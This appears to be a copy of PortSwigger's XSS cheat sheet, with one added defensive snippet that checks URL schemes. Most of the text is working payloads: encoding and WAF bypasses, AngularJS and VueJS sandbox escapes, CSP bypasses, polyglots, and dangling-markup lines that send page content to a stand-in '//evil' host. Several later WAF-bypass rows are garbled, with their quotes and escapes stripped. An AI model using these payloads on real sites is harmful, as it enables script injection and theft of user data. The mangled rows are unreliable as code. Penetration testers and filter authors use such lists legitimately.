Set window.name via the target attribute of a <base> tag: <base target="alert(1)"><a href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in base tag</a>
Set window.name via the target attribute of an <a> tag: <a target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//">XSS via target in a tag</a>
Set window.name via the usemap attribute of an <img> tag: <img src="validimage.png" width="10" height="10" usemap="#xss"><map name="xss"><area shape="rect" coords="0,0,82,126" target="alert(1)" href="http://subdomain1.portswigger-labs.net/xss/xss.php?context=js_string_single&x=%27;eval(name)//"></map>
Set window.name via the target attribute of a <form> tag: <form action="http://subdomain1.portswigger-labs.net/xss/xss.php" target="alert(1)"><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" value="XSS via target in a form"></form>
Set window.name via the formtarget attribute of an <input> tag, type submit: <form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input type="submit" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type submit"></form>
Set window.name via the formtarget attribute of an <input> tag, type image: <form><input type=hidden name=x value="';eval(name)//"><input type=hidden name=context value=js_string_single><input name=1 type="image" src="validimage.png" formaction="http://subdomain1.portswigger-labs.net/xss/xss.php" formtarget="alert(1)" value="XSS via formtarget in input type image"></form>
Special tags
Redirect to a different domain: <meta http-equiv="refresh" content="0; url=//portswigger-labs.net">
Meta charset attribute, UTF-7: <meta charset="UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Meta Content-Type, UTF-7: <meta http-equiv="Content-Type" content="text/html; charset=UTF-7" /> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (have to be at the start of the document) 1: +/v8 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (have to be at the start of the document) 2: +/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (have to be at the start of the document) 3: +/v+ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
UTF-7 BOM characters (have to be at the start of the document) 4: +/v/ +ADw-script+AD4-alert(1)+ADw-/script+AD4-
Upgrade insecure requests: <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
Disable JavaScript via iframe sandbox: <iframe sandbox src="//portswigger-labs.net"></iframe>
Disable the referer: <meta name="referrer" content="no-referrer">
Encoding
Overlong UTF-8:
  %C0%BCscript>alert(1)</script>
  %E0%80%BCscript>alert(1)</script>
  %F0%80%80%BCscript>alert(1)</script>
  %F8%80%80%80%BCscript>alert(1)</script>
  %FC%80%80%80%80%BCscript>alert(1)</script>
Unicode escapes: <script>\u0061lert(1)</script>
Unicode escapes, ES6 style: <script>\u{61}lert(1)</script>
Unicode escapes, ES6 style, zero padded: <script>\u{0000000061}lert(1)</script>
Hex encoding, JavaScript escapes: <script>eval('\x61lert(1)')</script>
Octal encoding:
  <script>eval('\141lert(1)')</script>
  <script>eval('alert(\061)')</script>
  <script>eval('alert(\61)')</script>
Decimal encoding with optional semicolon: <a href="&#106avascript:alert(1)">XSS</a> <a href="&#106;avascript:alert(1)">XSS</a>
SVG script with HTML encoding:
  <svg><script>&#97;lert(1)</script></svg>
  <svg><script>&#x61;lert(1)</script></svg>
  <svg><script>alert&NewLine;(1)</script></svg>
  <svg><script>x="&quot;,alert(1)//";</script></svg>
Decimal encoding with padded zeros: <a href="&#0000106avascript:alert(1)">XSS</a>
Hex encoding entities: <a href="&#x6a;avascript:alert(1)">XSS</a>
Hex encoding without semicolon, provided the next character is not a-f0-9 (tab and newline written \x09 and \x0a here):
  <a href="j&#x61vascript:alert(1)">XSS</a>
  <a href="&#x6a\x09avascript:alert(1)">XSS</a>
  <a href="&#x6a\x0aavascript:alert(1)">XSS</a>
Hex encoding with padded zeros: <a href="&#x0000006a;avascript:alert(1)">XSS</a>
Hex encoding is not case sensitive: <a href="&#X6A;avascript:alert(1)">XSS</a>
HTML entities:
  <a href="javascript&colon;alert(1)">XSS</a>
  <a href="java&Tab;script:alert(1)">XSS</a>
  <a href="java&NewLine;script:alert(1)">XSS</a>
  <a href="javascript&colon;alert&lpar;1&rpar;">XSS</a>
URL encoding: <a href="javascript:x='%27-alert(1)-%27'">XSS</a>
HTML entities and URL encoding: <a href="javascript:x='&percnt;27-alert(1)-%27'">XSS</a>
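The protocol and encoding vectors above all defeat the same naive check: a prefix test for `javascript:` on the raw attribute value. A browser first decodes HTML character references in the attribute (numeric ones with or without the semicolon and with leading zeros), then applies the URL parser's pre-processing (strip leading and trailing \x00-\x20, delete tab, LF and CR anywhere) and only then reads the scheme, case-insensitively. The following is an added example written for this page, not code from the cheat sheet: a check that performs those steps before comparing the scheme. The sample attribute values are constructed from the page's vectors, the named-reference table is a deliberately small subset of the HTML5 list, and the function names are this example's own.

```javascript
// Added example (not part of the PortSwigger cheat sheet): emulate what a
// browser does to an href/src attribute before it picks the scheme, so that a
// URL allow-list check sees "javascript:" through the encodings listed above.

// Subset of HTML named character references relevant to URL attributes.
// Browsers know about 2200 more; only these are needed for the page's vectors.
const NAMED_REFS = { colon: ':', Tab: '\t', NewLine: '\n', lpar: '(', rpar: ')',
                     percnt: '%', sol: '/', semi: ';', quot: '"', amp: '&', lt: '<', gt: '>' };

// Step 1: attribute-value decoding. Numeric references may omit ';' and carry
// leading zeros, and a hex reference consumes every following hex digit, which
// is why "&#x6a" only works when the next character is not [0-9a-f]. Named
// references are decoded only with a terminating ';' (legacy no-semicolon
// names such as &amp are not modelled here).
function decodeAttribute(value) {
  return value.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp > 0x10ffff ? '\uFFFD' : String.fromCodePoint(cp);
    }
    const known = Object.prototype.hasOwnProperty.call(NAMED_REFS, name);
    return m.endsWith(';') && known ? NAMED_REFS[name] : m;
  });
}

// Step 2: URL parser pre-processing (WHATWG URL spec): trim leading/trailing
// C0 controls and space, then delete ASCII tab and newline wherever they occur.
// Only after that is the scheme read, and it is compared case-insensitively.
function effectiveScheme(attrValue) {
  const url = decodeAttribute(attrValue)
    .replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '')
    .replace(/[\t\n\r]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

const SCRIPT_SCHEMES = new Set(['javascript', 'vbscript', 'data']);
function isScriptUrl(attrValue) { return SCRIPT_SCHEMES.has(effectiveScheme(attrValue)); }
function flagged(values) { return values.filter(isScriptUrl); }

// The check many filters actually implement: a prefix test on the raw value.
function naiveCheck(attrValue) { return /^javascript:/.test(attrValue); }

// Constructed samples following the cheat sheet's protocol and encoding rows.
const SAMPLES = [
  'javascript:alert(1)',
  'JaVaScript:alert(1)',                 // case
  ' javascript:alert(1)',                // \x01-\x20 before the protocol
  'javas\tcript:alert(1)',               // \x09 inside the protocol
  'javascript\n:alert(1)',               // \x0a before the colon
  '&#106avascript:alert(1)',             // decimal, no semicolon
  '&#0000106;avascript:alert(1)',        // padded zeros
  '&#x6a;avascript:alert(1)',            // hex entity
  '&#X6A;avascript:alert(1)',            // hex is not case sensitive
  'javascript&colon;alert&lpar;1&rpar;', // named entities
  'java&Tab;script:alert(1)',
  'java&NewLine;script:alert(1)',
  '&#x6aavascript:alert(1)',             // "a" swallowed by the hex run: NOT javascript
  'https://example.invalid/',
];

for (const v of SAMPLES) {
  console.log(JSON.stringify(v), 'naive:', naiveCheck(v), 'effective scheme:', effectiveScheme(v));
}
```

The order of the two steps is what the attribute context dictates: entity decoding belongs to the HTML parser and happens before the value ever reaches the URL parser, so `&Tab;` becomes a real tab and is then removed by the URL pre-processing. Running the scheme check on the raw attribute, or decoding entities after trimming, misses vectors in this section.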
Obfuscation
Data protocol inside script src with base64: <script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
Data protocol inside script src with base64 and HTML entities: <script src="data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;"></script>
Data protocol inside script src with base64 and URL encoding: <script src="data:text/javascript;base64,%59%57%78%6c%63%6e%51%6f%4d%53%6b%3d"></script>
Iframe srcdoc HTML encoded: <iframe srcdoc="&lt;script&gt;alert&lpar;1&rpar;&lt;&sol;script&gt;"></iframe>
Iframe JavaScript URL with HTML and URL encoding: <iframe src="javascript:&#x25;&#x33;&#x43;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;&#x25;&#x33;&#x43;&#x25;&#x32;&#x46;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x25;&#x33;&#x45;"></iframe>
SVG script with unicode escapes and HTML encoding: <svg><script>&#x5c;&#x75;&#x30;&#x30;&#x36;&#x31;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x63;&#x5c;&#x75;&#x30;&#x30;&#x36;&#x35;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x32;&#x5c;&#x75;&#x30;&#x30;&#x37;&#x34;(1)</script></svg>
Client-side template injection

VueJS reflected
Version | Author | Length | Vector
All versions | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
All versions | Mario Heiderich (Cure53) & Sebastian Lekies (Google), Eduardo Vela Nava (Google), Krzysztof Kotowicz (Google) | 62 | <div v-html="''.constructor.constructor('alert(1)')()">a</div>
All versions | Gareth Heyes (PortSwigger) | 39 | <x v-html=_c.constructor('alert(1)')()>
All versions | Peter af Geijerstam (Swedish Shellcode Factory) | 37 | <x v-if=_c.constructor('alert(1)')()>

AngularJS sandbox escapes, reflected
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
1.0.1 - 1.1.5 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}
1.2.0 - 1.2.1 | Jan Horn (Google) | 122 | {{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
1.2.2 - 1.2.5 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.6 - 1.2.18 | Jan Horn (Google) | 106 | {{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 124 | {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
1.2.24 - 1.2.29 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 23 | )))alert(1)
1.3.0 | Gábor Molnár (Google) | 272 | {{!ready && (ready = true) && (!call ? $$watchers[0].get(toString.constructor.prototype) : (a = apply) && (apply = constructor) && (valueOf = call) && (''+''.toString('F = Function.prototype;' + 'F.apply = F.a;' + 'delete F.a;' + 'delete F.valueOf;' + 'alert(1);')));}}
1.3.3 - 1.3.18 | Gareth Heyes (PortSwigger) | 128 | {{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.3.19 | Gareth Heyes (PortSwigger) | 102 | {{'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;$eval('x=alert(1)');}}
1.3.20 | Gareth Heyes (PortSwigger) | 65 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
1.4.0 - 1.4.9 | Gareth Heyes (PortSwigger) | 74 | {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
1.5.0 - 1.5.8 | Ian Hickey & Gareth Heyes (PortSwigger) | 79 | {{x={'y':''.constructor.prototype};x['y'].charAt=[].join;$eval('x=alert(1)');}}
1.5.9 - 1.5.11 | Jan Horn (Google) | 517 | {{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void 0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}
>=1.6.0 | Mario Heiderich (Cure53) | 41 | {{constructor.constructor('alert(1)')()}}
>=1.6.0 (shorter) | Gareth Heyes (PortSwigger) & Lewis Ardern (Synopsys) | 33 | {{$on.constructor('alert(1)')()}}

DOM based AngularJS sandbox escapes (using orderBy, or no $eval)
Version | Author | Length | Vector
1.0.1 - 1.1.5 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.2.0 - 1.2.18 | Jan Horn (Google) | 118 | a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()
1.2.19 - 1.2.23 | Mathias Karlsson (Detectify) | 119 | toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)
1.2.24 - 1.2.26 | Gareth Heyes (PortSwigger) | 317 | {}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()
1.2.27 - 1.2.29, 1.3.0 - 1.3.20 | Gareth Heyes (PortSwigger) | 20 | )))alert(1)
1.4.0 - 1.4.5 | Gareth Heyes (PortSwigger) | 75 | 'a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';
>=1.6.0 | Mario Heiderich (Cure53) | 37 | constructor.constructor('alert(1)')()
1.4.4 (without strings) | Gareth Heyes (PortSwigger) | 134 | toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)

AngularJS CSP bypasses
Version | Author | Length | Vector
All versions (Chrome) | Gareth Heyes (PortSwigger) | 81 | <input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'">
All versions (Chrome), shorter | Gareth Heyes (PortSwigger) | 56 | <input id=x ng-focus=$event.path|orderBy:'(z=alert)(1)'>
All versions (all browsers), shorter | Gareth Heyes (PortSwigger) | 91 | <input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">
1.2.0 - 1.5.0 | Eduardo Vela (Google) | 190 | <div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div>
All versions (Chrome), shorter, via oncut | Savan Gadhiya (NotSoSecure) | 49 | <input ng-cut=$event.path|orderBy:'(y=alert)(1)'>
Scriptless attacks

Dangling markup
Background attribute:
  <body background="//evil?
  <table background="//evil?
  <table><thead background="//evil?
  <table><tbody background="//evil?
  <table><tfoot background="//evil?
  <table><td background="//evil?
  <table><th background="//evil?
Link href stylesheet: <link rel=stylesheet href="//evil?
Link href icon: <link rel=icon href="//evil?
Meta refresh: <meta http-equiv="refresh" content="0; http://evil?
Img to pass markup through the src attribute:
  <img src="//evil?
  <image src="//evil?
Video using track element: <video><track default src="//evil?
Video using source element and src attribute: <video><source src="//evil?
Audio using source element and src attribute: <audio><source src="//evil?
Input src: <input type=image src="//evil?
Button using formaction: <form><button style="width:100%;height:100%" type=submit formaction="//evil?
Input using formaction: <form><input type=submit value="XSS" style="width:100%;height:100%" type=submit formaction="//evil?
Form using action: <button form=x style="width:100%;height:100%"><form id=x action="//evil?
Object data: <object data="//evil?
Iframe src: <iframe src="//evil?
Embed src: <embed src="//evil?
Use textarea to consume markup and post to an external site: <form><button formaction="//evil">XSS</button><textarea name=x>
Pass markup data through window.name using form target: <button form=x>XSS</button><form id=x action="//evil" target="
Pass markup data through window.name using base target: <a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="
Pass markup data through window.name using formtarget: <form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="
Using base href to pass data: <a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/
Using embed window name to pass data from the page: <embed src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using iframe window name to pass data from the page: <iframe src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using object window name to pass data from the page: <object data="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Using frame window name to pass data from the page: <frameset><frame src="http://subdomain1.portswigger-labs.net/dangling_markup/name.html" name="
Overwrite the type attribute with image in hidden inputs: <input type=hidden type=image src="//evil?

Polyglots
Polyglot payload 1: javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2: javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3: javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/PortSwiggerRes/)//'>
WAF bypass, global objects
XSS into a JavaScript string, string concatenation (window): window['ale'+'rt'](window['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (self): self['ale'+'rt'](self['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (this): this['ale'+'rt'](this['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (top): top['ale'+'rt'](top['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (parent): parent['ale'+'rt'](parent['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (frames): frames['ale'+'rt'](frames['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, string concatenation (globalThis): globalThis['ale'+'rt'](globalThis['doc'+'ument']['dom'+'ain'])
XSS into a JavaScript string, comment syntax (window): window[/*foo*/'alert'/*bar*/](window[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (self): self[/*foo*/'alert'/*bar*/](self[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (this): this[/*foo*/'alert'/*bar*/](this[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (top): top[/*foo*/'alert'/*bar*/](top[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (parent): parent[/*foo*/'alert'/*bar*/](parent[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (frames): frames[/*foo*/'alert'/*bar*/](frames[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, comment syntax (globalThis): globalThis[/*foo*/'alert'/*bar*/](globalThis[/*foo*/'document'/*bar*/]['domain'])
XSS into a JavaScript string, hex escape sequence (window): window['\x61\x6c\x65\x72\x74'](window['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (self): self['\x61\x6c\x65\x72\x74'](self['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (this): this['\x61\x6c\x65\x72\x74'](this['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (top): top['\x61\x6c\x65\x72\x74'](top['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (parent): parent['\x61\x6c\x65\x72\x74'](parent['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (frames): frames['\x61\x6c\x65\x72\x74'](frames['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence (globalThis): globalThis['\x61\x6c\x65\x72\x74'](globalThis['\x64\x6f\x63\x75\x6d\x65\x6e\x74']['\x64\x6f\x6d\x61\x69\x6e'])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window): window['\x65\x76\x61\x6c'](window['\x61\x6c\x65\x72\x74'](window['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self): self['\x65\x76\x61\x6c'](self['\x61\x6c\x65\x72\x74'](self['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this): this['\x65\x76\x61\x6c'](this['\x61\x6c\x65\x72\x74'](this['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top): top['\x65\x76\x61\x6c'](top['\x61\x6c\x65\x72\x74'](top['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent): parent['\x65\x76\x61\x6c'](parent['\x61\x6c\x65\x72\x74'](parent['\x61\x74\x6f\x62']('WFNT')))
XSS into a JavaScript string hex escape sequenceand base64 encoded string (frames)
frames[x65x76x61x6c](frames[x61x6cx65x72x74](frames[x61x74x6fx62](WFNT)))
XSS into a JavaScript string hex escape sequence globalThis[x65x76x61x6c](globalThis[x61x6cx65x72x74]
XSS into a JavaScript string hex escape sequence
and base64 encoded string (globalThis) (globalThis[x61x74x6fx62](WFNT)))
XSS into a JavaScript string octal escape sequence(window)
window[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(self)
self[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(this)
this[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(top)
top[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(parent)
parent[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(frames)
frames[141154145162164](130123123)
XSS into a JavaScript string octal escape sequence(globalThis)
globalThis[141154145162164](130123123)
XSS into a JavaScript string unicode escape(window)
window[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (self) self[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (this) this[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape (top) top[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(parent)
parent[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(frames)
frames[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string unicode escape(globalThis)
globalThis[u0061u006cu0065u0072u0074](u0058u0053u0053)
XSS into a JavaScript string RegExp sourceproperty (window)
window[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (self)
self[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (this)
this[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (top)
top[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (parent)
parent[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (frames)
frames[alsource+ertsource](XSSsource)
XSS into a JavaScript string RegExp sourceproperty (globalThis)
globalThis[alsource+ertsource](XSSsource)
XSS into a JavaScript string HieroglyphyJSFuck(window)
window[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(self)
self[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(this)
this[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(top)
top[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(parent)
parent[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(frames)
frames[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
XSS into a JavaScript string HieroglyphyJSFuck(globalThis)
globalThis[(++[])[+[]]+([]+[])[+[]+[]]+([][[]]+[])[+[]+[]+[]]+([]+[])[+[]]+([]+[])[+[]]]((++[])[+[]])
Impossible labs
Title | Description | Length limit | Closest vector
Basic context, WAF blocks <[a-zA-Z]
This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour, and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A.
Script based injection, but quotes, forward slash and backslash are escaped
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped, so you can't simply close the script block.
The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A. Closest vector: N/A.
innerHTML context, but no equals allowed
You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work, and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A.
Basic context, length limit
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q oncut=alert``, but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``
Attribute context, length limit
The context of this lab is inside an attribute, with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: oncut=alert``
Basic context, length limit, arbitrary code
It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q oncut=eval(name)
Attribute context, length limit, arbitrary code
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see link.
Injection occurs inside a frameset but before the body
We received a request from twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A.
Injection occurs inside single quoted string, only characters a-z0-9+` are allowed
The injection occurs within a single quoted string, and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A.
Classic vectors (XSS crypt)
Image src with JavaScript protocol
<img src="javascript:alert(1)">
Body background with JavaScript protocol
<body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE
<a href="vbscript:MsgBox+1">XSS</a> <a href="#" onclick="vbs:Msgbox+1">XSS</a> <a href="#" onclick="VBS:Msgbox+1">XSS</a> <a href="#" onclick="vbscript:Msgbox+1">XSS</a> <a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a> <a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href="#" onclick="jscript.compact:alert(1);">test</a> <a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript
<a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a> <a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript
<iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@"> <iframe language="VBScript.Encode" onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator
<a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator
<link href="xss.js" rel="stylesheet" type="text/javascript">
Button used to consume markup
<form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="\-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)"> <div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs
